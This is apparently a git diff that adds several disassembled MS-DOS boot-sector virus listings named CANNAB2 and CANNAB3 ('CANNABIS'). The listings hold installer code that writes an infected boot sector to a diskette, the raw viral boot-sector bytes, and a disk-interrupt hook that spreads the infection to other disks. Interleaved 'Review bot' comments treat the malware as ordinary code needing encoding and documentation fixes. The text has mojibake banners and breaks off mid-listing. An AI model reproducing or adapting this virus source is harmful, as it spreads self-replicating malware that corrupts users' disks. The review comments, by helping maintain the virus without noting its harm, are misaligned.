+;哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌 +; SUBROUTINE +;苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘 + +sub_1 proc near +loc_3: + mov ah,9 + int 21h ; DOS Services ah=function 09h + ; display char string at ds:dx + +loc_ret_4: + retn +sub_1 endp + +data_16 db 'Usage: A:', 0Dh, 0Ah + db '$' + db 'You are about to install a VIRUS' + db ' on your diskette!!!', 0Dh, 0Ah, 'I' + db 'nsert a formatted 360K diskette ' + db 'into the drive.', 0Dh, 0Ah, 'Are' + db ' you sure you want to proceed (y' + db '/N)? $' + db 0Dh, 0Ah, 0Ah, 'Writing...$' + db 0Dh, 0Ah, 'Error !!!' 
+ db 7 +data_19 db 24h +data_20 db 0EBh + db 3Ch, 90h + db 'CANNABIS' + db 00h, 02h, 02h, 01h, 00h, 02h + db 70h, 00h + db 0D0h, 02h,0FDh, 02h, 00h, 09h + db 00h, 02h, 00h + db 34 dup (0) + db 0FAh,0FCh, 33h,0C0h, 8Eh,0D8h + db 8Eh,0D0h,0BCh, 00h, 7Ch,0BBh + db 58h, 7Dh,0A1h, 4Ch, 00h, 3Bh + db 0C3h, 74h, 2Dh,0A3h,0ABh, 7Dh + db 0A1h, 4Eh, 00h,0A3h,0ADh, 7Dh + db 0BFh, 00h, 04h, 8Bh, 45h, 13h + db 48h, 89h, 45h, 13h,0B1h, 06h + db 0D3h,0E0h, 2Dh,0C0h, 07h, 8Eh + db 0C0h,0B9h, 00h, 02h, 8Bh,0F4h + db 8Bh,0FCh,0F3h,0A4h, 89h, 1Eh + db 4Ch, 00h, 8Ch, 06h, 4Eh, 00h + db 33h,0C0h, 16h, 07h + db 0BBh, 78h, 00h, 36h,0C5h, 37h + db 1Eh, 56h, 16h + db 53h + db 0BFh, 3Eh, 7Ch,0B9h, 0Bh, 00h + db 0F3h,0A4h, 06h, 1Fh,0C6h, 45h + db 0FEh, 0Fh, 8Bh, 0Eh, 18h, 7Ch + db 88h, 4Dh,0F9h, 89h, 47h, 02h + db 0C7h, 07h, 3Eh, 7Ch,0FBh,0CDh + db 13h, 72h, 48h, 33h,0C0h, 8Bh + db 0Eh, 13h, 7Ch, 89h, 0Eh, 20h + db 7Ch,0A1h, 16h, 7Ch,0D1h,0E0h + db 40h,0A3h, 50h, 7Ch,0A3h, 49h + db 7Ch,0A1h, 11h, 7Ch,0B1h, 04h + db 0D3h,0E8h, 01h, 06h, 49h, 7Ch + db 0BBh, 00h, 05h,0A1h, 50h, 7Ch + db 0E8h, 58h, 00h, 72h, 1Ch, 81h + db 3Fh, 49h, 4Fh, 75h, 09h, 81h + db 7Fh, 20h, 4Dh, 53h, 74h, 22h + db 0EBh + db 0Dh +loc_7: + cmp word ptr [bx],4249h + jne loc_8 ; Jump if not equal + cmp word ptr [bx+20h],4249h + je loc_9 ; Jump if equal +loc_8: + mov si,data_35e + call sub_3 + xor ax,ax ; Zero register + int 16h ; Keyboard i/o ah=function 00h + ; get keybd char in al, ah=scan + pop si + pop ds + pop word ptr [si] + pop word ptr [si+2] + int 19h ; Bootstrap loader +loc_9: + mov bx,700h + mov cx,3 + mov ax,word ptr ds:[7C49h] + +locloop_10: + call sub_2 + jc loc_8 ; Jump if carry Set + inc ax + add bx,offset data_19 + loop locloop_10 ; Loop if cx > 0 + + mov ch,byte ptr ds:[7C15h] + mov dl,0 + mov bx,word ptr ds:[7C49h] + mov ax,0 +;* jmp far ptr loc_1 ;* + db 0EAh, 00h, 00h, 70h, 00h + +;哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌 +; SUBROUTINE +;苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘 + +sub_2 proc near + push ax + 
push cx + div byte ptr ds:[7C18h] ; al,ah rem = ax/data + cwd ; Word to double word + inc ah + shr al,1 ; Shift w/zeros fill + adc dh,0 + xchg ah,al + xchg ax,cx + mov ax,201h + int 13h ; Disk dl=drive ? ah=func 02h + ; read sectors to memory es:bx + ; al=#,ch=cyl,cl=sectr,dh=head + pop cx + pop ax + +loc_ret_11: + retn +sub_2 endp + + +;哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌 +; SUBROUTINE +;苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘 + +sub_3 proc near +loc_12: + lodsb ; String [si] to al + or al,al ; Zero ? + jz loc_ret_11 ; Jump if zero + mov ah,0Eh + mov bx,7 + int 10h ; Video display ah=functn 0Eh + ; write char al, teletype mode + jmp short loc_12 +sub_3 endp + + push ax + push ds + cmp ah,2 + jne loc_14 ; Jump if not equal + test dl,0FEh + jnz loc_14 ; Jump if not zero + xor ax,ax ; Zero register + mov ds,ax + test byte ptr ds:data_3e,1 + jnz loc_14 ; Jump if not zero + push cx + push bx + push di + push si + push es + mov ax,201h + mov bx,7E00h + mov cx,1 + push cs + push cs + pop es + pop ds + pushf ; Push flags + push cs + call sub_4 + jc loc_13 ; Jump if carry Set + mov si,data_36e + mov di,data_24e + mov cl,33h ; '3' + rep movsb ; Rep when cx >0 Mov [si] to es:[di] + mov ax,301h + mov bx,7C00h + mov cl,1 + pushf ; Push flags + push cs + call sub_4 +loc_13: + pop es + pop si + pop di + pop bx + pop cx +loc_14: + pop ds + pop ax + +;哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌 +; SUBROUTINE +;苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘 + +sub_4 proc near + jmp dword ptr cs:data_34e + db 0, 0, 0, 0 + db 0Dh, 0Ah, 'Non-System disk or dis' + db 'k error', 0Dh, 0Ah, 'Replace and' + db ' press a key when ready', 0Dh, 0Ah + db 10 dup (0) + db 55h,0AAh +sub_4 endp + + +seg_a ends + + + + end start diff --git a/MSDOS/Virus.MSDOS.Unknown.cannab2.txt b/MSDOS/Virus.MSDOS.Unknown.cannab2.txt new file mode 100644 index 00000000..9a8f6ce9 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.cannab2.txt 
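Review bot: The banner and subroutine separators in this hunk (`;圹圹…`, `;哌哌…`, `;苘苘…`) appear to be CP437 box-drawing bytes that were decoded under a double-byte code page, so the comment art displays as mojibake; the same applies to cannab2.txt, cannab3.asm, cannab3i.asm and the trailer lines of cannab4.asm. Committing the listings in their original encoding, or reducing the banners to ASCII `;----` rules, would let them display and diff cleanly. Separately, the equates `data_25e` through `data_33e` are declared but never referenced, because the code they describe is left as raw `db` bytes between `data_20` and `loc_7`, and the commented-out `;* jmp far ptr loc_1 ;*` names a label that does not exist in this file. A note such as `; data_20: boot-sector image; bytes up to loc_7 were left undisassembled` at `data_20` would tell a reader the listing is partial rather than broken.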
@@ -0,0 +1,278 @@ + +PAGE 59,132 + +;圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹 +;圹 圹 +;圹 CANNAB2 圹 +;圹 圹 +;圹 Created: 7-Nov-91 圹 +;圹 Passes: 5 Analysis Options on: none 圹 +;圹 圹 +;圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹 + +data_3e equ 43Fh +data_14e equ 5Ch +data_15e equ 78h +data_24e equ 7C0Bh ;* +data_25e equ 7C11h ;* +data_26e equ 7C13h ;* +data_27e equ 7C15h ;* +data_28e equ 7C16h ;* +data_29e equ 7C18h ;* +data_30e equ 7C20h ;* +data_31e equ 7C3Eh ;* +data_32e equ 7C49h ;* +data_33e equ 7C50h ;* +data_34e equ 7DABh ;* +data_35e equ 7DAFh ;* +data_36e equ 7E0Bh ;* + +seg_a segment byte public + assume cs:seg_a, ds:seg_a + + + org 100h + +cannab2 proc far + +start: + mov dx,13Dh + dec byte ptr ds:data_14e + js loc_3 ; Jump if sign=1 + mov dx,155h + call sub_1 + xor ah,ah ; Zero register + int 16h ; Keyboard i/o ah=function 00h + ; get keybd char in al, ah=scan + and al,0DFh + cmp al,59h ; 'Y' + jne loc_ret_4 ; Jump if not equal + mov dl,0 + mov ah,0 + int 13h ; Disk dl=drive a ah=func 00h + ; reset disk, al=return status + jc loc_2 ; Jump if carry Set + mov dx,1E6h + call sub_1 + mov cx,1 + mov bx,offset data_20 + mov ax,301h + cwd ; Word to double word + int 13h ; Disk dl=drive a ah=func 03h + ; write sectors from mem es:bx + ; al=#,ch=cyl,cl=sectr,dh=head + jnc loc_ret_4 ; Jump if carry=0 +loc_2: + mov dx,offset data_16+0B7h ; ('') + +cannab2 endp + +;哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌 +; SUBROUTINE +;苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘 + +sub_1 proc near +loc_3: + mov ah,9 + int 21h ; DOS Services ah=function 09h + ; display char string at ds:dx + +loc_ret_4: + retn +sub_1 endp + +data_16 db 'Usage: A:', 0Dh, 0Ah + db '$' + db 'You are about to install a VIRUS' + db ' on your diskette!!!', 0Dh, 0Ah, 'I' + db 'nsert a formatted 360K diskette ' + db 'into the drive.', 0Dh, 0Ah, 'Are' + db ' you sure you want to proceed (y' + db '/N)? $' + db 0Dh, 0Ah, 0Ah, 'Writing...$' + db 0Dh, 0Ah, 'Error !!!' 
+ db 7 +data_19 db 24h +data_20 db 0EBh + db 3Ch, 90h + db 'CANNABIS' + db 00h, 02h, 02h, 01h, 00h, 02h + db 70h, 00h + db 0D0h, 02h,0FDh, 02h, 00h, 09h + db 00h, 02h, 00h + db 34 dup (0) + db 0FAh,0FCh, 33h,0C0h, 8Eh,0D8h + db 8Eh,0D0h,0BCh, 00h, 7Ch,0BBh + db 58h, 7Dh,0A1h, 4Ch, 00h, 3Bh + db 0C3h, 74h, 2Dh,0A3h,0ABh, 7Dh + db 0A1h, 4Eh, 00h,0A3h,0ADh, 7Dh + db 0BFh, 00h, 04h, 8Bh, 45h, 13h + db 48h, 89h, 45h, 13h,0B1h, 06h + db 0D3h,0E0h, 2Dh,0C0h, 07h, 8Eh + db 0C0h,0B9h, 00h, 02h, 8Bh,0F4h + db 8Bh,0FCh,0F3h,0A4h, 89h, 1Eh + db 4Ch, 00h, 8Ch, 06h, 4Eh, 00h + db 33h,0C0h, 16h, 07h + db 0BBh, 78h, 00h, 36h,0C5h, 37h + db 1Eh, 56h, 16h + db 53h + db 0BFh, 3Eh, 7Ch,0B9h, 0Bh, 00h + db 0F3h,0A4h, 06h, 1Fh,0C6h, 45h + db 0FEh, 0Fh, 8Bh, 0Eh, 18h, 7Ch + db 88h, 4Dh,0F9h, 89h, 47h, 02h + db 0C7h, 07h, 3Eh, 7Ch,0FBh,0CDh + db 13h, 72h, 48h, 33h,0C0h, 8Bh + db 0Eh, 13h, 7Ch, 89h, 0Eh, 20h + db 7Ch,0A1h, 16h, 7Ch,0D1h,0E0h + db 40h,0A3h, 50h, 7Ch,0A3h, 49h + db 7Ch,0A1h, 11h, 7Ch,0B1h, 04h + db 0D3h,0E8h, 01h, 06h, 49h, 7Ch + db 0BBh, 00h, 05h,0A1h, 50h, 7Ch + db 0E8h, 58h, 00h, 72h, 1Ch, 81h + db 3Fh, 49h, 4Fh, 75h, 09h, 81h + db 7Fh, 20h, 4Dh, 53h, 74h, 22h + db 0EBh + db 0Dh +loc_7: + cmp word ptr [bx],4249h + jne loc_8 ; Jump if not equal + cmp word ptr [bx+20h],4249h + je loc_9 ; Jump if equal +loc_8: + mov si,data_35e + call sub_3 + xor ax,ax ; Zero register + int 16h ; Keyboard i/o ah=function 00h + ; get keybd char in al, ah=scan + pop si + pop ds + pop word ptr [si] + pop word ptr [si+2] + int 19h ; Bootstrap loader +loc_9: + mov bx,700h + mov cx,3 + mov ax,word ptr ds:[7C49h] + +locloop_10: + call sub_2 + jc loc_8 ; Jump if carry Set + inc ax + add bx,offset data_19 + loop locloop_10 ; Loop if cx > 0 + + mov ch,byte ptr ds:[7C15h] + mov dl,0 + mov bx,word ptr ds:[7C49h] + mov ax,0 +;* jmp far ptr loc_1 ;* + db 0EAh, 00h, 00h, 70h, 00h + +;哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌 +; SUBROUTINE +;苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘 + +sub_2 proc near + push ax + 
push cx + div byte ptr ds:[7C18h] ; al,ah rem = ax/data + cwd ; Word to double word + inc ah + shr al,1 ; Shift w/zeros fill + adc dh,0 + xchg ah,al + xchg ax,cx + mov ax,201h + int 13h ; Disk dl=drive ? ah=func 02h + ; read sectors to memory es:bx + ; al=#,ch=cyl,cl=sectr,dh=head + pop cx + pop ax + +loc_ret_11: + retn +sub_2 endp + + +;哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌 +; SUBROUTINE +;苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘 + +sub_3 proc near +loc_12: + lodsb ; String [si] to al + or al,al ; Zero ? + jz loc_ret_11 ; Jump if zero + mov ah,0Eh + mov bx,7 + int 10h ; Video display ah=functn 0Eh + ; write char al, teletype mode + jmp short loc_12 +sub_3 endp + + push ax + push ds + cmp ah,2 + jne loc_14 ; Jump if not equal + test dl,0FEh + jnz loc_14 ; Jump if not zero + xor ax,ax ; Zero register + mov ds,ax + test byte ptr ds:data_3e,1 + jnz loc_14 ; Jump if not zero + push cx + push bx + push di + push si + push es + mov ax,201h + mov bx,7E00h + mov cx,1 + push cs + push cs + pop es + pop ds + pushf ; Push flags + push cs + call sub_4 + jc loc_13 ; Jump if carry Set + mov si,data_36e + mov di,data_24e + mov cl,33h ; '3' + rep movsb ; Rep when cx >0 Mov [si] to es:[di] + mov ax,301h + mov bx,7C00h + mov cl,1 + pushf ; Push flags + push cs + call sub_4 +loc_13: + pop es + pop si + pop di + pop bx + pop cx +loc_14: + pop ds + pop ax + +;哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌 +; SUBROUTINE +;苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘 + +sub_4 proc near + jmp dword ptr cs:data_34e + db 0, 0, 0, 0 + db 0Dh, 0Ah, 'Non-System disk or dis' + db 'k error', 0Dh, 0Ah, 'Replace and' + db ' press a key when ready', 0Dh, 0Ah + db 10 dup (0) + db 55h,0AAh +sub_4 endp + + +seg_a ends + + + + end start diff --git a/MSDOS/Virus.MSDOS.Unknown.cannab3.asm b/MSDOS/Virus.MSDOS.Unknown.cannab3.asm new file mode 100644 index 00000000..c6d1a179 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.cannab3.asm 
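Review bot: This file is the cannab2.asm listing again under a `.txt` name: every visible line matches the `.asm` hunk, and only the blob id differs (`9a8f6ce9` here versus `1ebaf286`), which presumably reflects line endings or trailing whitespace rather than content. Two near-identical copies of one sample will drift as soon as one is corrected. Unless the `.txt` copy is intentionally a non-assemblable mirror, drop it, or state its purpose in a first-line comment such as `; Text copy of Virus.MSDOS.Unknown.cannab2.asm; keep in sync`.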
@@ -0,0 +1,280 @@ + +PAGE 59,132 + +;圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹 +;圹 圹 +;圹 CANNAB3 圹 +;圹 圹 +;圹 Created: 6-Jun-92 圹 +;圹 Passes: 5 Analysis Options on: none 圹 +;圹 圹 +;圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹 + +data_3e equ 43Fh +data_14e equ 5Ch +data_15e equ 78h +data_23e equ 7C0Bh ;* +data_24e equ 7C11h ;* +data_25e equ 7C13h ;* +data_26e equ 7C15h ;* +data_27e equ 7C16h ;* +data_28e equ 7C18h ;* +data_29e equ 7C20h ;* +data_30e equ 7C3Eh ;* +data_31e equ 7C49h ;* +data_32e equ 7C50h ;* +data_33e equ 7DAFh ;* +data_34e equ 7DB3h ;* +data_35e equ 7E0Bh ;* + +seg_a segment byte public + assume cs:seg_a, ds:seg_a + + + org 100h + +cannab3 proc far + +start: + mov dx,13Dh + dec byte ptr ds:data_14e + js loc_3 ; Jump if sign=1 + mov dx,155h + call sub_1 + xor ah,ah ; Zero register + int 16h ; Keyboard i/o ah=function 00h + ; get keybd char in al, ah=scan + and al,0DFh + cmp al,59h ; 'Y' + jne loc_ret_4 ; Jump if not equal + mov dl,0 + mov ah,0 + int 13h ; Disk dl=drive a ah=func 00h + ; reset disk, al=return status + jc loc_2 ; Jump if carry Set + mov dx,1E6h + call sub_1 + mov cx,1 + mov bx,offset data_20 + mov ax,301h + cwd ; Word to double word + int 13h ; Disk dl=drive a ah=func 03h + ; write sectors from mem es:bx + ; al=#,ch=cyl,cl=sectr,dh=head + jnc loc_ret_4 ; Jump if carry=0 +loc_2: + mov dx,offset data_16+0B7h ; ('') + +cannab3 endp + +;哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌 +; SUBROUTINE +;苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘 + +sub_1 proc near +loc_3: + mov ah,9 + int 21h ; DOS Services ah=function 09h + ; display char string at ds:dx + +loc_ret_4: + retn +sub_1 endp + +data_16 db 'Usage: A:', 0Dh, 0Ah + db '$' + db 'You are about to install a VIRUS' + db ' on your diskette!!!', 0Dh, 0Ah, 'I' + db 'nsert a formatted 360K diskette ' + db 'into the drive.', 0Dh, 0Ah, 'Are' + db ' you sure you want to proceed (y' + db '/N)? $' + db 0Dh, 0Ah, 0Ah, 'Writing...$' + db 0Dh, 0Ah, 'Error !!!' 
+ db 7 +data_19 db 24h +data_20 db 0EBh + db 3Ch, 90h + db 'CANNABIS' + db 00h, 02h, 02h, 01h, 00h, 02h + db 70h, 00h + db 0D0h, 02h,0FDh, 02h, 00h, 09h + db 00h, 02h, 00h + db 34 dup (0) + db 0FAh,0FCh, 33h,0C0h, 8Eh,0D8h + db 8Eh,0D0h,0BCh, 00h, 7Ch,0BBh + db 58h, 7Dh,0A1h, 4Ch, 00h, 3Bh + db 0C3h, 74h, 2Dh,0A3h,0AFh, 7Dh + db 0A1h, 4Eh, 00h,0A3h,0B1h, 7Dh + db 0BFh, 00h, 04h, 8Bh, 45h, 13h + db 48h, 89h, 45h, 13h,0B1h, 06h + db 0D3h,0E0h, 2Dh,0C0h, 07h, 8Eh + db 0C0h,0B9h, 00h, 02h, 8Bh,0F4h + db 8Bh,0FCh,0F3h,0A4h, 89h, 1Eh + db 4Ch, 00h, 8Ch, 06h, 4Eh, 00h + db 33h,0C0h, 16h, 07h + db 0BBh, 78h, 00h, 36h,0C5h, 37h + db 1Eh, 56h, 16h + db 53h + db 0BFh, 3Eh, 7Ch,0B9h, 0Bh, 00h + db 0F3h,0A4h, 06h, 1Fh,0C6h, 45h + db 0FEh, 0Fh, 8Bh, 0Eh, 18h, 7Ch + db 88h, 4Dh,0F9h, 89h, 47h, 02h + db 0C7h, 07h, 3Eh, 7Ch,0FBh,0CDh + db 13h, 72h, 48h, 33h,0C0h, 8Bh + db 0Eh, 13h, 7Ch, 89h, 0Eh, 20h + db 7Ch,0A1h, 16h, 7Ch,0D1h,0E0h + db 40h,0A3h, 50h, 7Ch,0A3h, 49h + db 7Ch,0A1h, 11h, 7Ch,0B1h, 04h + db 0D3h,0E8h, 01h, 06h, 49h, 7Ch + db 0BBh, 00h, 05h,0A1h, 50h, 7Ch + db 0E8h, 58h, 00h, 72h, 1Ch, 81h + db 3Fh, 49h, 4Fh, 75h, 09h, 81h + db 7Fh, 20h, 4Dh, 53h, 74h, 22h + db 0EBh + db 0Dh +loc_7: + cmp word ptr [bx],4249h + jne loc_8 ; Jump if not equal + cmp word ptr [bx+20h],4249h + je loc_9 ; Jump if equal +loc_8: + mov si,data_34e + call sub_3 + xor ax,ax ; Zero register + int 16h ; Keyboard i/o ah=function 00h + ; get keybd char in al, ah=scan + pop si + pop ds + pop word ptr [si] + pop word ptr [si+2] + int 19h ; Bootstrap loader +loc_9: + mov bx,700h + mov cx,3 + mov ax,word ptr ds:[7C49h] + +locloop_10: + call sub_2 + jc loc_8 ; Jump if carry Set + inc ax + add bx,offset data_19 + loop locloop_10 ; Loop if cx > 0 + + mov ch,byte ptr ds:[7C15h] + mov dl,0 + mov bx,word ptr ds:[7C49h] + mov ax,0 +;* jmp far ptr loc_1 ;* + db 0EAh, 00h, 00h, 70h, 00h + +;哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌 +; SUBROUTINE +;苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘 + +sub_2 proc near + push ax + 
push cx + div byte ptr ds:[7C18h] ; al,ah rem = ax/data + cwd ; Word to double word + inc ah + shr al,1 ; Shift w/zeros fill + adc dh,0 + xchg ah,al + xchg ax,cx + mov ax,201h + int 13h ; Disk dl=drive ? ah=func 02h + ; read sectors to memory es:bx + ; al=#,ch=cyl,cl=sectr,dh=head + pop cx + pop ax + +loc_ret_11: + retn +sub_2 endp + + +;哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌 +; SUBROUTINE +;苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘 + +sub_3 proc near +loc_12: + lodsb ; String [si] to al + or al,al ; Zero ? + jz loc_ret_11 ; Jump if zero + mov ah,0Eh + mov bx,7 + int 10h ; Video display ah=functn 0Eh + ; write char al, teletype mode + jmp short loc_12 +sub_3 endp + + push ax + push ds + cmp ah,2 + jne loc_14 ; Jump if not equal + test dx,0FFFEh + jnz loc_14 ; Jump if not zero + or ch,ch ; Zero ? + jnz loc_14 ; Jump if not zero + xor ax,ax ; Zero register + mov ds,ax + test byte ptr ds:data_3e,1 + jnz loc_14 ; Jump if not zero + push cx + push bx + push di + push si + push es + mov ax,201h + mov bx,7E00h + mov cl,1 + push cs + push cs + pop es + pop ds + pushf ; Push flags + push cs + call sub_4 + jc loc_13 ; Jump if carry Set + mov si,data_35e + mov di,data_23e + mov cl,33h ; '3' + rep movsb ; Rep when cx >0 Mov [si] to es:[di] + mov ax,301h + mov bx,7C00h + mov cl,1 + pushf ; Push flags + push cs + call sub_4 +loc_13: + pop es + pop si + pop di + pop bx + pop cx +loc_14: + pop ds + pop ax + +;哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌 +; SUBROUTINE +;苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘 + +sub_4 proc near + jmp dword ptr cs:data_33e + db 0, 0, 0, 0 + db 0Dh, 0Ah, 'Non-System disk or dis' + db 'k error', 0Dh, 0Ah, 'Replace and' + db ' press a key when ready', 0Dh, 0Ah + db 00h, 00h, 00h, 00h, 00h, 00h + db 55h,0AAh +sub_4 endp + + +seg_a ends + + + + end start diff --git a/MSDOS/Virus.MSDOS.Unknown.cannab3i.asm b/MSDOS/Virus.MSDOS.Unknown.cannab3i.asm new file mode 100644 index 00000000..c6d1a179 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.cannab3i.asm 
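Review bot: The header names this listing CANNAB3 but records nothing about its relation to cannab2.asm, although the visible body is the same disassembly with a renumbered address table (`data_33e`/`data_34e` where cannab2 uses `data_34e`/`data_35e`) and reworked entry checks before `loc_14` (`test dx,0FFFEh` and `or ch,ch` in place of `test dl,0FEh`). A provenance line in the banner, e.g. `; Variant of CANNAB2 (7-Nov-91): entry checks in the hook and trailing padding differ`, would save the next reader a side-by-side diff. As in cannab2.asm, the `data_24e`…`data_32e` equates are declared but unreferenced because the region between `data_20` and `loc_7` is left as raw `db` bytes, and `;* jmp far ptr loc_1 ;*` names a label this file does not define.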
@@ -0,0 +1,280 @@ + +PAGE 59,132 + +;圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹 +;圹 圹 +;圹 CANNAB3 圹 +;圹 圹 +;圹 Created: 6-Jun-92 圹 +;圹 Passes: 5 Analysis Options on: none 圹 +;圹 圹 +;圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹 + +data_3e equ 43Fh +data_14e equ 5Ch +data_15e equ 78h +data_23e equ 7C0Bh ;* +data_24e equ 7C11h ;* +data_25e equ 7C13h ;* +data_26e equ 7C15h ;* +data_27e equ 7C16h ;* +data_28e equ 7C18h ;* +data_29e equ 7C20h ;* +data_30e equ 7C3Eh ;* +data_31e equ 7C49h ;* +data_32e equ 7C50h ;* +data_33e equ 7DAFh ;* +data_34e equ 7DB3h ;* +data_35e equ 7E0Bh ;* + +seg_a segment byte public + assume cs:seg_a, ds:seg_a + + + org 100h + +cannab3 proc far + +start: + mov dx,13Dh + dec byte ptr ds:data_14e + js loc_3 ; Jump if sign=1 + mov dx,155h + call sub_1 + xor ah,ah ; Zero register + int 16h ; Keyboard i/o ah=function 00h + ; get keybd char in al, ah=scan + and al,0DFh + cmp al,59h ; 'Y' + jne loc_ret_4 ; Jump if not equal + mov dl,0 + mov ah,0 + int 13h ; Disk dl=drive a ah=func 00h + ; reset disk, al=return status + jc loc_2 ; Jump if carry Set + mov dx,1E6h + call sub_1 + mov cx,1 + mov bx,offset data_20 + mov ax,301h + cwd ; Word to double word + int 13h ; Disk dl=drive a ah=func 03h + ; write sectors from mem es:bx + ; al=#,ch=cyl,cl=sectr,dh=head + jnc loc_ret_4 ; Jump if carry=0 +loc_2: + mov dx,offset data_16+0B7h ; ('') + +cannab3 endp + +;哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌 +; SUBROUTINE +;苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘 + +sub_1 proc near +loc_3: + mov ah,9 + int 21h ; DOS Services ah=function 09h + ; display char string at ds:dx + +loc_ret_4: + retn +sub_1 endp + +data_16 db 'Usage: A:', 0Dh, 0Ah + db '$' + db 'You are about to install a VIRUS' + db ' on your diskette!!!', 0Dh, 0Ah, 'I' + db 'nsert a formatted 360K diskette ' + db 'into the drive.', 0Dh, 0Ah, 'Are' + db ' you sure you want to proceed (y' + db '/N)? $' + db 0Dh, 0Ah, 0Ah, 'Writing...$' + db 0Dh, 0Ah, 'Error !!!' 
+ db 7 +data_19 db 24h +data_20 db 0EBh + db 3Ch, 90h + db 'CANNABIS' + db 00h, 02h, 02h, 01h, 00h, 02h + db 70h, 00h + db 0D0h, 02h,0FDh, 02h, 00h, 09h + db 00h, 02h, 00h + db 34 dup (0) + db 0FAh,0FCh, 33h,0C0h, 8Eh,0D8h + db 8Eh,0D0h,0BCh, 00h, 7Ch,0BBh + db 58h, 7Dh,0A1h, 4Ch, 00h, 3Bh + db 0C3h, 74h, 2Dh,0A3h,0AFh, 7Dh + db 0A1h, 4Eh, 00h,0A3h,0B1h, 7Dh + db 0BFh, 00h, 04h, 8Bh, 45h, 13h + db 48h, 89h, 45h, 13h,0B1h, 06h + db 0D3h,0E0h, 2Dh,0C0h, 07h, 8Eh + db 0C0h,0B9h, 00h, 02h, 8Bh,0F4h + db 8Bh,0FCh,0F3h,0A4h, 89h, 1Eh + db 4Ch, 00h, 8Ch, 06h, 4Eh, 00h + db 33h,0C0h, 16h, 07h + db 0BBh, 78h, 00h, 36h,0C5h, 37h + db 1Eh, 56h, 16h + db 53h + db 0BFh, 3Eh, 7Ch,0B9h, 0Bh, 00h + db 0F3h,0A4h, 06h, 1Fh,0C6h, 45h + db 0FEh, 0Fh, 8Bh, 0Eh, 18h, 7Ch + db 88h, 4Dh,0F9h, 89h, 47h, 02h + db 0C7h, 07h, 3Eh, 7Ch,0FBh,0CDh + db 13h, 72h, 48h, 33h,0C0h, 8Bh + db 0Eh, 13h, 7Ch, 89h, 0Eh, 20h + db 